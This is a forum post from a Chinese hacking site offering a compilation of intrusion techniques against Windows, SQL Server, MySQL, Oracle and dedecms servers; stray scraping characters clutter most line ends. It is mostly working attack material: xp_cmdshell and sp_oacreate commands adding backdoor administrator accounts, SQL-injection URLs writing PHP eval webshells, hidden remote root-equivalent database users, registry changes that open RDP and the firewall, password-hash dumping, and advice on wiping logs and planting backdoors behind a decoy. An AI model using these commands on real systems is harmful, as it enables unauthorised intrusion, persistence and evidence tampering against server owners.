中国网络渗透测试联盟

标题: 渗透技术大全 [打印本页]

作者: admin    时间: 2013-2-27 21:24
标题: 渗透技术大全
& ~5 k- I- I+ m- j
1.net user administrator /passwordreq:no
! \" B( O! u9 j" i9 u这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
& N) g0 x: g0 G' c; T2.比较巧妙的建克隆号的步骤
$ L2 b! r. ?# `) u: h, E先建一个user的用户
+ F$ Y- j1 r! _: Y% i% ]然后导出注册表。然后在计算机管理里删掉
5 h! @" w  Z( z6 m, c在导入,在添加为管理员组
& x6 P- F9 d  _: v' d3.查radmin密码: T0 A! [3 f; x- w
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
- @: ?" J% Q7 M1 Y# T; c# [4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]" U2 g; ^; H( V% z: |; l
建立一个"services.exe"的项  e  c3 v) z1 Z2 K
再在其下面建立(字符串值)8 [- r: `' Q5 z- H2 e
键值为mu ma的全路径* h1 Q2 H" e2 t8 t, W+ {/ t9 F
5.runas /user:guest cmd2 ]% `8 @: F) b- Z: S# z* ?/ }/ [
测试用户权限!" @" L2 j. r4 S" g" w/ |- W0 k
6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?( E3 m% G2 h, T8 d( P' |0 a! D. G  G
7.入侵后漏洞修补、痕迹清理,后门置放:
/ j. J! M; `* Q1 j# e6 ^基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
8 w# v, a+ a( E- {8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
& o" \2 K' t' f. _! l2 p7 a; L2 h* C* c! B% W5 _0 t" A3 G3 Q
for example0 R2 X! W; w4 e9 L
' v; ?  L: e4 V4 v% b
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
: D: W" C- b9 Q! g
0 k' l/ |; h! }5 rdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
& V3 k2 Q" t8 ?9 _" `9 Z
6 R6 y; u" E: A7 A) t# c9:MSSQL SERVER 2005默认把xpcmdshell 给ON了, N7 }$ I. `9 w' _. t
如果要启用的话就必须把他加到高级用户模式- F, B8 p" x0 ~, S+ s) R
可以直接在注入点那里直接注入" d1 e# f1 ], I; b: B5 K6 v% F% A3 N9 K
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--* v, G9 m! ^4 b& ~5 f9 P
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--' l6 o# G; W. ^7 |+ }7 ?
或者& x9 D6 N3 _9 l
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
' ]1 R" g! _8 J( x来恢复cmdshell。
. g$ \; d1 e) |3 _
& q1 |) d; @- o. p/ N$ V分析器( J) A3 @9 H: c6 n8 n' M. q8 L
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
9 C5 n7 t4 x' S7 S+ k然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
8 u8 F4 S+ q1 ~7 Y10.xp_cmdshell新的恢复办法
8 x; O4 A8 J8 K; Y; D  h; bxp_cmdshell新的恢复办法
$ t# t( U' T. l: s0 H* J! H扩展储存过程被删除以后可以有很简单的办法恢复:+ X% g* L1 A; ?" B
删除8 ]6 F* S0 l1 u2 h, V( N
drop procedure sp_addextendedproc
6 I: Y' W# r" P% T7 D& Ldrop procedure sp_oacreate" u8 @3 ?, U0 t7 o; y9 a
exec sp_dropextendedproc 'xp_cmdshell') l1 ^1 x4 |; S

) V4 ^2 M" M* P, T4 n恢复
+ m+ `$ g0 d9 V7 y$ ~, D  adbcc addextendedproc ("sp_oacreate","odsole70.dll")
4 q1 g' E4 p  j7 C1 ~dbcc addextendedproc ("xp_cmdshell","xplog70.dll")- k  _% d3 N! K% `- o8 D4 T
# T/ o5 G$ W' N7 H8 Q0 V4 U; G
这样可以直接恢复,不用去管sp_addextendedproc是不是存在" _" Y" r7 z* ], W* w1 l2 N: E/ J9 \7 {

- b0 o: l# Y& S8 D7 Q-----------------------------
! I, S. A) }6 D" h; f2 ~) E  S1 ~" o8 }" q9 F9 a9 K1 @4 p
删除扩展存储过过程xp_cmdshell的语句:) A- ?0 W0 X8 P! ?
exec sp_dropextendedproc 'xp_cmdshell'
, [. W" F( R3 ?" W/ ^8 z
2 k/ b/ P0 F& m- E* `- X: T# F恢复cmdshell的sql语句
/ i, I+ @, `9 T$ h4 F5 l$ B2 |exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'" n; P8 y$ q2 `) u  p! n4 V" V. a- t

4 K3 R$ z4 @: e8 O6 N8 k/ p, W5 G& ?  E0 T1 D, }+ J1 F9 J1 b
开启cmdshell的sql语句
4 F) Y% p3 l. A5 u% `' I! s0 f* G2 I% U7 k2 ^+ F
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'0 h/ Q7 p" j% F9 g) ?1 n' @
( Z; _- S" ~2 L* I( X" S2 h9 a
判断存储扩展是否存在
4 ^7 F" l: c& k/ Uselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'! C1 |  s* h. V  F' m
返回结果为1就ok
2 z: t6 H8 Q8 |  x3 b$ L# i9 P4 }; D5 W& t% P  b
恢复xp_cmdshell
. h$ L+ W  l9 g  }  Z. Jexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell', M$ Z: d' y! u! w. }
返回结果为1就ok
$ g# s5 s# x, p5 D  E5 [% e. f& ?1 U
否则上传xplog7.0.dll
  D& E. N5 O, }+ }. kexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
3 ~9 k: D$ B) w( h/ i( Y( `8 s3 w- |8 K
堵上cmdshell的sql语句
/ j' X0 y, T# b' ^sp_dropextendedproc "xp_cmdshel( I& I, m+ S( b4 w9 D* g  ]
-------------------------
3 L& l2 U6 n/ s) ?' h清除3389的登录记录用一条系统自带的命令:2 F) S: |. N5 Z9 D7 q% N
reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f
# X* L: _/ E+ I* R: `# v( J/ T- M) r3 a
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
* F8 d$ `3 [' T2 Q" u; S, G5 j在 mysql里查看当前用户的权限9 t  j; X5 A: g' b& ~( b3 N
show grants for  8 R+ {* M- L" j2 a

; j$ z# r. ~3 R! A: e以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。6 {9 M1 r9 A1 |/ w& V
+ J! }& I) m0 e2 c6 t: L1 K
4 _3 b3 G3 m, h2 N" ~
Create USER 'itpro'@'%' IDENTIFIED BY '123';
0 X" V$ S! q+ O1 j4 d) u" Y. `6 |# T7 O/ E2 A1 g, g$ k
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION3 a2 Z* R/ s1 F. M$ n7 l

  Z( Q! i5 f' EMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 07 ~8 Y: B0 v+ _& Z9 s8 r6 ~

* c1 K( C4 k: B5 B  _3 nMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
" y! `- A& Y8 U' P$ M# K
6 H4 m0 P  I4 E- x- d0 T# U7 l- _0 m9 L搞完事记得删除脚印哟。
4 J2 O: n! \% J$ g* Z. C! O9 E( Y6 V( D
Drop USER 'itpro'@'%';+ h) h" U# |- A5 U' }9 s! y

7 O1 m! o+ r  m9 m# zDrop DATABASE IF EXISTS `itpro` ;
' r! ^: A1 ^, \* ?4 Q
, F1 }  A9 N8 e: X  D当前用户获取system权限* y6 \' n/ y1 q. a
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact0 O! {0 Z* `1 v1 N  D
sc start SuperCMD3 A' Z# W" C, p0 ~
程序代码% c; T* \- d1 H2 }: Q9 D
<SCRIPT LANGUAGE="VBScript">
  V+ [" y/ G3 m; Oset wsnetwork=CreateObject("WSCRIPT.NETWORK")! y0 H  c, A4 k# A
os="WinNT://"&wsnetwork.ComputerName! e2 M# g3 {7 h7 X' ?5 j/ e8 {
Set ob=GetObject(os)
) `/ g! u- Q" H2 [5 u6 V$ i/ VSet oe=GetObject(os&"/Administrators,group"), E9 ]3 o* W7 v
Set od=ob.Create("user","nosec")
" Q$ S' |- G* D+ @* C$ Lod.SetPassword "123456abc!@#"
  Q9 }" G# |) \2 n. |0 z8 Eod.SetInfo
3 ^- D+ {4 G$ ySet of=GetObject(os&"/nosec",user): U8 \* ~0 F% i# W6 t9 {/ R
oe.add os&"/nosec"' A- W2 W8 a* |& s4 t3 \
</Script>
" {+ d: x" r7 O" t8 f<script language=javascript>window.close();</script>
3 `( v: w, F0 x! s; U, d0 b& e) e  k( i4 m0 M

6 m; I- ~, B. J5 k+ y- B! Q, k! p3 h" t- t* p& z8 G/ ]
  m2 M0 S; T2 f7 k1 a! ~
突破验证码限制入后台拿shell
" z' I: [* X8 |% ^& G程序代码0 p' L! R* u: g) x
REGEDIT4
; K7 f. H+ H' m; }  ]# q; \+ q[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] / q- a( T/ i" _3 e$ X4 P
"BlockXBM"=dword:00000000
3 s3 m1 r- F2 L. T, K8 N# p, X. N, |- m# L2 J+ E* M4 p
保存为code.reg,导入注册表,重器IE( \0 d8 I& c* }5 }2 |( G3 |) _9 n
就可以了
* R" A3 [7 s1 L0 ]0 ^union写马
; g% Q* z/ D/ p6 `3 ~1 L+ o# v程序代码
+ v2 ]6 F/ |+ u- f+ j; b3 qwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*6 M) \+ I- c- A8 }1 E+ B7 ^! u

% L5 U& l/ V* J& F9 {应用在dedecms注射漏洞上,无后台写马+ H7 T# k* j# U; U; K5 Q# H) k
dedecms后台,无文件管理器,没有outfile权限的时候
$ z& ?8 ~/ j0 _1 z& G在插件管理-病毒扫描里
1 O' Q! |  U+ F  V- K; g写一句话进include/config_hand.php里$ v3 C  m1 Y! o( g
程序代码
- Q  {( i, m) M, A8 U>';?><?php @eval($_POST[cmd]);?>
+ k. W. M8 ?7 c4 V
. e1 B* D: `7 E1 X4 ]( _: g0 A2 v/ t- i8 r. a( J
如上格式
3 Y% C. s8 \$ H9 A, O0 N7 m& U- Z
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
( ?8 x; ~* x4 c) S程序代码
8 l  ~+ Y) ?9 [- F; ]select username,password from dba_users;
" u% [* n: m* w( v1 X) y6 ^' `) ]( f; Q# `' d; l7 k
* S: c* a( H2 m, q$ s
mysql远程连接用户0 @1 v( {6 O1 W' Z' v" `7 Q/ c
程序代码2 J7 a) S' o( }$ v" Q
& y* t0 l9 Y" }- S6 I2 |3 }
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
- j9 y9 B6 o, s( U( {' `GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
: i( n% d- y3 a6 G) f( QMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
5 X$ m; F2 P! E6 C* O- MMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
: o3 P: ^1 v3 P4 ^, h
  N/ V6 P4 n9 U/ ]9 I
! |" c; z& n! s$ C5 t* V, f: s, s* L3 H: X
& L4 ^& @/ }' {: t" t
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
8 D' s! s# A4 f$ t' L
* j! {, ~$ |+ d7 t# B5 S1.查询终端端口9 w, Q0 w8 E3 g+ N3 p8 x

/ ^6 d& [; ^6 G5 i0 X8 y! n3 Hxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
- B+ I, j5 j9 x1 H# y  f* j& j( [) m- l
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"8 }( v; ^- H) U# {
type tsp.reg
" ^% N; n" K3 P* F5 x, {+ g' [1 M) l) ^) E: q
2.开启XP&2003终端服务( m4 D5 g: b0 _. _' `
% K7 N% h+ ~# d& ~0 C6 A
2 ?) H+ @; y% k. J$ U; I9 |* k
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f. }3 g$ c$ I# j; v

0 J+ Z& k6 S! M2 K  |- d/ E6 d' j- B! c. Z' `3 |
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
# x. E" G; I+ |( c4 w# s3 A; o! r6 L" }) z" B0 _3 g
3.更改终端端口为20008(0x4E28)
+ l$ X' ?7 M1 W& C. @1 s$ y
' A7 t/ {& ?; _) \5 v  U- EREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
9 K9 b7 m( d# a8 t
$ K% h2 M: F  KREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
- _  V8 {# C3 D" F6 G2 X5 |1 p
; r, q% j6 ]4 e8 V* [. \4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制0 A! a9 R& b8 y# c: h4 x2 Y

. ~. E: \* `7 y! [) ?1 K6 HREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f) J$ f4 a# R! a1 [  h0 s6 a0 l- _
4 n& ~# ^+ X) B: i3 p4 }+ D& N

( F5 }+ \1 L% L7 c* U& X& I5.开启Win2000的终端,端口为3389(需重启)
# C6 [3 W# A9 `4 A2 k- L8 D) O* K% {" o7 y# m8 F
echo Windows Registry Editor Version 5.00 >2000.reg & r* x# v% J4 q& ?
echo. >>2000.reg
" E% M+ P1 ?, `, M7 r$ ~/ j/ x, E( gecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg . Y! Z  R; q& e, S' Q! M
echo "Enabled"="0" >>2000.reg & s7 ?9 B$ j2 A# b9 q3 O4 A" w* _" n
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
4 ~1 h: g" N3 n# r( gecho "ShutdownWithoutLogon"="0" >>2000.reg
- H3 a1 n8 ]" ?echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg / ]& m% ^8 j& \4 I% j$ I0 V. J
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg ! W5 \3 x& X- l! q8 m0 q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg ! E0 [- Z# s: m1 v" `. C/ h
echo "TSEnabled"=dword:00000001 >>2000.reg
' I+ j" I* J! Decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
* G) {7 B1 g5 |echo "Start"=dword:00000002 >>2000.reg 4 g3 h* U' O# e# E% L2 l' h
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 3 c: P8 }" w* |! o9 U% h: u, e
echo "Start"=dword:00000002 >>2000.reg
8 C2 _( f2 q: D, G5 o4 p: T* Vecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg   |: w9 z9 v  Q* r2 Y) ]6 O& U
echo "Hotkey"="1" >>2000.reg . Z0 Z) _9 `( V! G" J* F& w* k6 G
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg ' |2 a) |  l6 R" m8 U+ ^5 _
echo "ortNumber"=dword:00000D3D >>2000.reg 8 I' ]+ v  _% ~* x3 F5 r1 o; @! S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg   T- n3 W1 `1 H$ \2 \
echo "ortNumber"=dword:00000D3D >>2000.reg
4 V* d2 E3 r: Y) u7 T! x8 a4 J9 \! [( F
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)9 s4 N4 A( ?: ~6 _5 X" g2 H

+ S  i) t& m% z@ECHO OFF & cd/d %temp% & echo [version] > restart.inf( Y0 A* H7 c6 ?
(set inf=InstallHinfSection DefaultInstall); {5 y; g* H! s% \: m
echo signature=$chicago$ >> restart.inf6 l; w5 x; r' \/ F7 E
echo [defaultinstall] >> restart.inf: {2 @  Z* U/ g2 `8 S
rundll32 setupapi,%inf% 1 %temp%\restart.inf, c" o- a8 O" E2 |

# n3 s3 j/ c. L6 B1 w2 W
6 a, N' y& i, x7.禁用TCP/IP端口筛选 (需重启)1 K0 d' T4 ~( T6 x7 m- L  l6 n
  ~4 O$ v4 t* {# ?) E$ A
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
. J. R: t3 v: x8 }$ M* J
$ \5 k% x6 T0 o8.终端超出最大连接数时可用下面的命令来连接0 F; t1 H2 j& W4 S
/ r8 p4 |/ ]+ i* H5 n) U
mstsc /v:ip:3389 /console: l' ]  X# q9 \2 T( T- y9 K
$ r$ A2 Y: P& P5 ]0 y
9.调整NTFS分区权限" A: u$ {/ A1 @  X
" A) Z  O5 i; t( ~' M1 ?
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)% t/ R, Q5 |/ t) X

0 d0 s1 B3 h. W. `) V! vcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)+ d/ t- o5 g: k/ N; s7 X3 z- C: ^
, o/ c; ^# ]" L8 v
------------------------------------------------------- i6 I5 R1 z- I9 t  q" K
3389.vbs . [$ a: L. h9 x% d* {
On Error Resume Next
# `0 r' H$ s* Lconst HKEY_LOCAL_MACHINE = &H80000002
) |" u# w( h# ^- n  J- NstrComputer = "."
& J  p% _# a. A0 x: OSet StdOut = WScript.StdOut- b( U& `/ j* `
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
' f4 E8 q9 A5 u) astrComputer & "\root\default:StdRegProv")& n# i* u2 G7 B- D, N
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server". v( `9 b8 x" ~' w' p4 N  h: ^6 _
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath0 w. m+ T( G' W/ k" j4 C
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
+ g2 }# m+ M8 V6 Noreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
4 b$ b" X5 F1 T! z5 c* |strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"5 s/ `% ~- `( k! U
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
3 x( _6 n, C5 C: tstrValueName = "fDenyTSConnections"
! @: z7 g8 e1 R4 ddwValue = 0+ L0 w0 n$ x8 h
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
2 P! q9 X' t7 ?& ]: ?% a3 mstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
/ Y+ N+ I& o1 cstrValueName = "ortNumber"
) g/ c* W2 K4 l+ mdwValue = 3389: L2 \% k( g) e
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue: o: m5 f9 T/ k% O% `( S3 h- N
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"2 D, z: \! ~4 G6 Z
strValueName = "ortNumber"
; ^6 G( V- R) B/ n7 N& `/ Q6 HdwValue = 3389* h2 e3 \1 d& P  B6 A: ^
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue: ~' F# ~4 a$ s+ [4 @) p
Set R = CreateObject("WScript.Shell")
8 j: k5 Z, a; x+ ER.run("Shutdown.exe -f -r -t 0")
# F) U0 r) ~9 \$ g# p
- {% t9 L- f/ {; t# p& i1 |- G" b. N删除awgina.dll的注册表键值
6 T( T( y8 b2 ]4 S程序代码: s% X5 \2 @8 S# i2 J+ d

4 _$ l" C" p( D' d6 ]0 y9 P# breg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
2 ?7 S( `/ K7 ~: }: }5 v' d0 q9 J( D* {* S( U
1 S3 H( C6 Y1 A3 z$ I: `# W) H, H

3 G' d0 r  c- |( N6 e1 }0 F0 t( T0 j7 o) }; o* V
程序代码5 b0 G, Y; P5 ^+ [( l$ q8 {
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
, ]) r3 \9 n$ B. D5 b, f( X. w! C! r' f
设置为1,关闭LM Hash
. D' G9 W% D3 e9 n2 z2 e) E' d( @' u# R. ?
/ q( {! P2 e% L" J3 g数据库安全:入侵Oracle数据库常用操作命令
8 {, t7 p# x: e最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。+ g- b' o, W7 _) u* F) D' L, _1 n
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
+ g3 N. P; h, `3 c2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;1 g) A. ]. \1 l
3、SQL>connect / as sysdba ;(as sysoper)或9 ^& q! c/ @- }( K5 m
connect internal/oracle AS SYSDBA ;(scott/tiger)
0 {$ K$ j* N; N, z* k& Xconn sys/change_on_install as sysdba;
- G1 K$ j# ?+ S1 I4、SQL>startup; 启动数据库实例  p3 @  w0 X' W0 e. e" {
5、查看当前的所有数据库: select * from v$database;6 x& V/ v/ e3 R, \6 q
select name from v$database;
+ o& c% c6 B$ N! U) H$ Y* `1 m6、desc v$databases; 查看数据库结构字段
4 C4 e; t( U6 I2 M7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:* R6 ^8 ]; D8 w
SQL>select * from V_$PWFILE_USERS;2 F7 ~  O) w4 k0 y# b1 S
Show user;查看当前数据库连接用户
+ ~5 r; I0 X- n- b6 u8、进入test数据库:database test;% W* m8 L( W) G  C  r& O: G- c+ j
9、查看所有的数据库实例:select * from v$instance;7 L2 y" d, o  j/ P- T* a. J
如:ora9i8 `$ S% f8 w& z
10、查看当前库的所有数据表:
/ l/ J$ i1 z( L7 p- ^$ u7 d' USQL> select TABLE_NAME from all_tables;
, p" f& s; \( ~: K4 \+ Wselect * from all_tables;3 ]0 R: M# Q* d3 R5 J$ k; P/ z
SQL> select table_name from all_tables where table_name like '%u%';8 o! [' N* n1 k& ?0 r2 ~- m* F
TABLE_NAME
' w: D5 Y0 m+ k" C4 T8 Y$ K0 q------------------------------5 j0 _# B2 X1 t$ U5 M' U2 b/ H) U
_default_auditing_options_
4 @5 l: Q* b# ~: X11、查看表结构:desc all_tables;& {7 M6 I' P* N3 Q& }
12、显示CQI.T_BBS_XUSER的所有字段结构:
3 W) P8 |/ n2 F5 g7 [  I1 Jdesc CQI.T_BBS_XUSER;/ v5 u+ e/ Y: s( u
13、获得CQI.T_BBS_XUSER表中的记录:, z  u' K/ P* x( Z) m' m0 k7 U
select * from CQI.T_BBS_XUSER;! H; D( r* g! R; `- h
14、增加数据库用户:(test11/test)- C+ j! N3 V1 A1 r! I( R5 q& ?7 t6 G
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
! N# F6 T" `$ x$ s1 D15、用户授权:$ u( j8 G4 o4 a0 K3 ?
grant connect,resource,dba to test11;
7 B$ T' x; J* h8 @8 |grant sysdba to test11;
$ {7 c; f7 ]" J- i" Ecommit;
( n+ k1 P, f, h0 V% E% v. h& I) v16、更改数据库用户的密码:(将sys与system的密码改为test.)6 l! ^& ~8 E! U. Q9 x7 B
alter user sys indentified by test;. a) i" c8 O) j: T# ~5 t+ ?# R
alter user system indentified by test;
" j- g3 E3 z! n6 X5 |( d  o- _% S5 N6 W  f4 V
applicationContext-util.xml9 a- L. z3 \5 [8 S
applicationContext.xml+ T8 W7 ?" k9 M3 E" K+ ~
struts-config.xml% S3 ?; }9 C6 r/ Z
web.xml4 l" f3 Z) f% n- W2 ~  Q) B
server.xml
8 c* `5 c3 k6 w) C9 t+ Atomcat-users.xml
0 h1 T; t+ @! Q  U3 Rhibernate.cfg.xml
4 w$ L7 }( y6 ~. D; ~. Bdatabase_pool_config.xml" D- H; M1 n0 \" `$ [; D& N
0 ]& W, A, J+ E5 e, O4 \7 }

! [$ i  ?) Z5 n$ u' u% L\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置9 Z3 _2 m; w" k% c( W, Y
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
5 Y6 f, ^/ z0 Z5 _5 ^; n\WEB-INF\struts-config.xml  文件目录结构
+ o1 R( w6 F- m+ @# k* g: e" B* c7 L# ~  [
spring.properties 里边包含hibernate.cfg.xml的名称# ]+ Y, ~6 c1 [$ F  v! J/ n

/ ~- D; U# g. f- j4 i4 m2 [) _: j0 p8 Y4 d; }1 i1 h2 i. ~
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
5 p0 Q* @3 K  Q4 V4 x1 C
0 n* K, C7 s- s: k; }. i1 q如果都找不到  那就看看class文件吧。。
5 _- I6 q6 ^% ]: t& d: A; Z7 \% s( a
测试1:- S5 g' M" t$ q8 I
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
# H* v& u3 n$ V) d+ a7 u, q% E6 C1 a6 Z
7 `$ ?; P. x. r$ i0 x' G" G测试2:' G5 i; _. Y6 p: e
% T. I+ B5 v( @
create table dirs(paths varchar(100),paths1 varchar(100), id int)' t* B6 h: m9 h; V! e( D: N
. m+ _  i* q7 ]5 h  e  d/ |  c8 t
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--) I: p0 O% R7 M9 Y

+ {* D+ n! {$ _1 y% L! e$ @SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t10 p2 r/ z. f0 E2 N+ i
; f/ c& N+ [2 A$ _
查看虚拟机中的共享文件:
. t; d9 l/ S7 |  U在虚拟机中的cmd中执行' Z2 u  m& ?# P) J* }# \
\\.host\Shared Folders( C1 q% }9 n* n/ T8 i
. S( x; n; A: f% j0 o
cmdshell下找终端的技巧
1 d+ S# C% M9 l' B找终端:
' Y, m2 w& ~% D; |) I# T7 V# D( S& ]第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
2 A- T1 }  k5 W6 K   而终端所对应的服务名为:TermService
5 j& u! ^$ I/ F! K7 x第二步:用netstat -ano命令,列出所有端口对应的PID值!
: Y, ?3 P; C2 v2 `  i' Q   找到PID值所对应的端口
. N& M  h( ~- h- ?: ~: {+ _: |/ K+ x( M8 i* _6 Y; v
查询sql server 2005中的密码hash$ J7 S* _$ J, o2 z* p
SELECT password_hash FROM sys.sql_logins where name='sa'7 J* y/ t" z+ I# z" X. L( [
